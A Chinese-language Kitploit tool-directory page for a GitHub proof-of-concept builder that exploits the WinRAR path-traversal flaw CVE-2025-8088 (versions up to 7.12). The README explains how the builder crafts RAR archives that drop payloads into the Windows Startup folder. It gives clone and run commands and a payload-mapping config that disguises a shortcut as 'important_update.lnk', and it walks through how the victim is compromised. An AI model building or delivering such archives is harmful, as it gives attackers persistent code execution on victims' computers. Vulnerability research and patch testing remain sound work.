Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8088-WinRAR-builder — 针对 WinRAR 漏洞(CVE-2025-8088)的 POC 漏洞利用程序,影响版本为 7.12 及更低版本 | Kitploit
工具/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
漏洞分析漏洞利用Web应用程序漏洞利用恶意软件分析Payload 开发
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

针对 WinRAR 漏洞(CVE-2025-8088)的 POC 漏洞利用程序,影响版本为 7.12 及更低版本

查看仓库
110个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8088-WinRAR-builder

针对 WinRAR 漏洞(CVE-2025-8088)的 POC 利用工具,影响版本为 7.12 及更低版本

🚀 工作原理

  1. 创建一个嵌入其他载荷的 Rar 文件
  2. 使用多个 ADS 流 🔄 - 以不同的路径遍历深度附加载荷流
  3. 操纵 RAR 头 ⚙️ - 修改归档结构以利用路径遍历漏洞
  4. 将载荷投放至启动目录 📂 - 解压时尝试将载荷写入 Windows 启动文件夹

🛠️ 使用方法

  1. 克隆仓库
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. 准备载荷
root@kitploit:~
mkdir payloads
  • 将我们的载荷添加到该文件夹(exe、dll、lnk 等)
  • 修改脚本中的 PAYLOAD_MAPPING
root@kitploit:~
# 2. 将我们的载荷映射到对应的目标位置
#   格式:(payloads 目录中的文件名, 目标解压路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # 载荷 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # 载荷 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # 载荷 3
    # 添加你自己的
]
  1. 运行利用工具
root@kitploit:~
python builder.py <decoy_file>

🔄 执行流程

  1. 受害者使用存在漏洞的 WinRAR(≤7.12)解压 RAR 文件
  2. 载荷被写入目标文件夹,例如:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. 下次重启时 ➡️ 载荷自动执行

📋 环境要求

  • Windows 操作系统 🪟
  • Python 3.x 🐍
  • 已安装 WinRAR
下载工具